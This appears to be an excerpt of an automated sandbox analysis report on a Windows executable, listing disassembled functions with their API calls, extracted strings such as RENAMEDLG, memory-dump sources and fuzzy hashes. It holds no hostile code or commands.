                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007CBB27
                                                                      • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,007CA275,?,?,00000800,?,007CA23A,?,007C755C), ref: 007CBBC5
                                                                      • _wcslen.LIBCMT ref: 007CBC3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CurrentDirectory
                                                                      • String ID: UNC$\\?\
                                                                      • API String ID: 3341907918-253988292
                                                                      • Opcode ID: 784ddd660aa5733af83b6891d42cb3739f8150c63e52af812805d880877dde6b
                                                                      • Instruction ID: 414f3491853427e34e71579d20719e6f5eb49d2f14762e456e7b9d0096eff7d7
                                                                      • Opcode Fuzzy Hash: 784ddd660aa5733af83b6891d42cb3739f8150c63e52af812805d880877dde6b
                                                                      • Instruction Fuzzy Hash: A2418E71400219A6CF21AF20CC46FEA77B9AF45391F14446EF955A3251EBBDEE908BB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DCD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcschr.LIBVCRUNTIME ref: 007DCD84
                                                                        • Part of subcall function 007DAF98: _wcschr.LIBVCRUNTIME ref: 007DB033
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr$CompareString
                                                                      • String ID: <$HIDE$MAX$MIN
                                                                      • API String ID: 69343711-3358265660
                                                                      • Opcode ID: e70bdcb781efacff9679064a08f6d0e2b30d5d5f65be2b4503013f3e8ca17647
                                                                      • Instruction ID: 24fd7fe0e278d25ef9f4854bafb52e3e33dbecb5dd940620571e956597d8b565
                                                                      • Opcode Fuzzy Hash: e70bdcb781efacff9679064a08f6d0e2b30d5d5f65be2b4503013f3e8ca17647
                                                                      • Instruction Fuzzy Hash: 5531677190021AAADF26DB54CC45EEE77BCEB14350F404567E505E7280EBB8DE84CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 007DAAD2
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 007DAB01
                                                                      • ReleaseDC.USER32(00000000,?), ref: 007DAB99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectRelease
                                                                      • String ID: -}$7}
                                                                      • API String ID: 1429681911-118115984
                                                                      • Opcode ID: df37c619357c9a70e973d5f2634cfe247481e5470c96819397e81abb8fa697fd
                                                                      • Instruction ID: e8c491c492f838bbb5ba9b4713fb5b462701fe45dd392f638ff63158bcd25f42
                                                                      • Opcode Fuzzy Hash: df37c619357c9a70e973d5f2634cfe247481e5470c96819397e81abb8fa697fd
                                                                      • Instruction Fuzzy Hash: 1321E272108704AFD3119FA5DC48E6FBFE9FB89351F044829FA4692220D6399A568F72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007CB9B8
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • _wcschr.LIBVCRUNTIME ref: 007CB9D6
                                                                      • _wcschr.LIBVCRUNTIME ref: 007CB9E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                      • String ID: %c:\
                                                                      • API String ID: 525462905-3142399695
                                                                      • Opcode ID: 41eb4c503f971d6ddec505ae8fd4ddd9e89e27d33e5ad00b36d614aa9b221610
                                                                      • Instruction ID: d8512c56af9a722e34a15447c01b2e39139dfc8b7c735b9f6d8b40782c6f8ca6
                                                                      • Opcode Fuzzy Hash: 41eb4c503f971d6ddec505ae8fd4ddd9e89e27d33e5ad00b36d614aa9b221610
                                                                      • Instruction Fuzzy Hash: CC01F563504311E99A34AB368C8BE6BB7ACEFD5770F40840EF584D7082EB38E84083B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadBitmapW.USER32(00000065), ref: 007DB6ED
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 007DB712
                                                                      • DeleteObject.GDI32(00000000), ref: 007DB744
                                                                      • DeleteObject.GDI32(00000000), ref: 007DB767
                                                                        • Part of subcall function 007DA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,007DB73D,00000066), ref: 007DA6D5
                                                                        • Part of subcall function 007DA6C2: SizeofResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA6EC
                                                                        • Part of subcall function 007DA6C2: LoadResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA703
                                                                        • Part of subcall function 007DA6C2: LockResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA712
                                                                        • Part of subcall function 007DA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA72D
                                                                        • Part of subcall function 007DA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA73E
                                                                        • Part of subcall function 007DA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007DA7A7
                                                                        • Part of subcall function 007DA6C2: GlobalUnlock.KERNEL32(00000000), ref: 007DA7C6
                                                                        • Part of subcall function 007DA6C2: GlobalFree.KERNEL32(00000000), ref: 007DA7CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                      • String ID: ]
                                                                      • API String ID: 1428510222-3352871620
                                                                      • Opcode ID: d532ce47ef198594ddc24b0476e14e8b02359184a1e648b4ac919bbacb6469df
                                                                      • Instruction ID: 905cdffaf838d71cf75740372b0a53bb7221153aaf8a1d0d9fd43b6703d48e58
                                                                      • Opcode Fuzzy Hash: d532ce47ef198594ddc24b0476e14e8b02359184a1e648b4ac919bbacb6469df
                                                                      • Instruction Fuzzy Hash: A5016D36940615F7C7226B749C1DAAF7AB9BBC0B62F1A0017F900B7391DF69CD0646B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DD64B
                                                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 007DD661
                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 007DD675
                                                                      • SetDlgItemTextW.USER32(?,00000068), ref: 007DD684
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: RENAMEDLG
                                                                      • API String ID: 445417207-3299779563
                                                                      • Opcode ID: c349eacd27064baebff7000a3d9ac69a167baeca9d54ab998552c0a392e4ebca
                                                                      • Instruction ID: bbabcbc02d150cd1c0130c580c1cad76f76c8e11e9e9a6c4f97138282f61bd29
                                                                      • Opcode Fuzzy Hash: c349eacd27064baebff7000a3d9ac69a167baeca9d54ab998552c0a392e4ebca
                                                                      • Instruction Fuzzy Hash: 42012833244214FAD2304F649D09F67777DFB5AB81F114412F305A21D1C6AADE059BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007E7E24,?,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002), ref: 007E7E93
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007E7EA6
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,007E7E24,?,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002,00000000), ref: 007E7EC9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 89e94bad45b52edef3365cb3c5171c5c70986732d6eed0374e56d6af5acb107a
                                                                      • Instruction ID: 2c513851ff56503c6b23ecd8d1f2a6014bb2c357a40c7db200b09b223c43b812
                                                                      • Opcode Fuzzy Hash: 89e94bad45b52edef3365cb3c5171c5c70986732d6eed0374e56d6af5acb107a
                                                                      • Instruction Fuzzy Hash: E7F06871901248BBCB15AFA1DC09BBEBFB5FF44711F0081A9F805A2260DB389F40CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                        • Part of subcall function 007D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007CF2E4
                                                                      • GetProcAddress.KERNEL32(008081C8,CryptUnprotectMemory), ref: 007CF2F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                      • API String ID: 2141747552-1753850145
                                                                      • Opcode ID: 0e0e68a644c697db41caa32c4829c9d9a84860f724aee93fb224e652e6bf0c0c
                                                                      • Instruction ID: bcb64313f4831aeb2473f52853d6af82be5dd62de1203f62eca8eab7d91d46b1
                                                                      • Opcode Fuzzy Hash: 0e0e68a644c697db41caa32c4829c9d9a84860f724aee93fb224e652e6bf0c0c
                                                                      • Instruction Fuzzy Hash: 16E08CB0911756AECB209F3A984DB22BFE56F04700F14C86EF1DAA3740DABCD580CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer$_abort
                                                                      • String ID:
                                                                      • API String ID: 2252061734-0
                                                                      • Opcode ID: a5615ac3165e6dbcedd6d2ee31f5a53fb82d957a19082d019b7098ea8be16a3a
                                                                      • Instruction ID: cca332512b092dccac503f0569cbb302ed862d3d0e7f28170d586c99d47cb33e
                                                                      • Opcode Fuzzy Hash: a5615ac3165e6dbcedd6d2ee31f5a53fb82d957a19082d019b7098ea8be16a3a
                                                                      • Instruction Fuzzy Hash: 5B51E671602295EFDB29CF16D849B7A73A9FF18310F24451DE901472A2D739ED82D790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 007EBF39
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007EBF5C
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007EBF82
                                                                      • _free.LIBCMT ref: 007EBF95
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007EBFA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: b2bb19606681485d04673c17aa0e0ef5edfdc614e1f53b68c08ef7cca8241071
                                                                      • Instruction ID: 6e79ec7730c02fe59261d4bc2949099dfdd28c254479f0cff5650ed11b77f970
                                                                      • Opcode Fuzzy Hash: b2bb19606681485d04673c17aa0e0ef5edfdc614e1f53b68c08ef7cca8241071
                                                                      • Instruction Fuzzy Hash: 2001D4726036957F272116BB5C4CC7B7F6DDECABA03244129F908D2100EF68CD01D5B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,007E91AD,007EB188,?,007E9813,00000001,00000364,?,007E40EF,?,?,00801098), ref: 007E986E
                                                                      • _free.LIBCMT ref: 007E98A3
                                                                      • _free.LIBCMT ref: 007E98CA
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E98D7
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E98E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 60209af43c6d62a3bbd2b9d96cfeecf52d0abdbec2c7ca5651e96bb210f4e6bb
                                                                      • Instruction ID: 843ccce34b8198f183c59edb0d6eb77946aef03c7d96262f0008b1a909472a01
                                                                      • Opcode Fuzzy Hash: 60209af43c6d62a3bbd2b9d96cfeecf52d0abdbec2c7ca5651e96bb210f4e6bb
                                                                      • Instruction Fuzzy Hash: 3C01F437247681ABC22263676C8992B272EDBDE7707250135F615962B2EE7C8C01926A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007D11CF: ResetEvent.KERNEL32(?), ref: 007D11E1
                                                                        • Part of subcall function 007D11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007D11F5
                                                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 007D0F21
                                                                      • CloseHandle.KERNEL32(?,?), ref: 007D0F3B
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 007D0F54
                                                                      • CloseHandle.KERNEL32(?), ref: 007D0F60
                                                                      • CloseHandle.KERNEL32(?), ref: 007D0F6C
                                                                        • Part of subcall function 007D0FE4: WaitForSingleObject.KERNEL32(?,000000FF,007D1101,?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FEA
                                                                        • Part of subcall function 007D0FE4: GetLastError.KERNEL32(?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FF6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                      • String ID:
                                                                      • API String ID: 1868215902-0
                                                                      • Opcode ID: 0129bed5a6bca24b667a5fdd1f7d1203fb90555d221b01d4b6e98028fe93ee06
                                                                      • Instruction ID: b6594fbfdc6bef4ae4f7c6a93feacac006f850fdcc6f8bbbe4ca7e0cf05b9893
                                                                      • Opcode Fuzzy Hash: 0129bed5a6bca24b667a5fdd1f7d1203fb90555d221b01d4b6e98028fe93ee06
                                                                      • Instruction Fuzzy Hash: F7017571500744EFC7229B64DC84FD6FBBAFB08710F10492AF25B92260CB797A45CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 007EC817
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007EC829
                                                                      • _free.LIBCMT ref: 007EC83B
                                                                      • _free.LIBCMT ref: 007EC84D
                                                                      • _free.LIBCMT ref: 007EC85F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
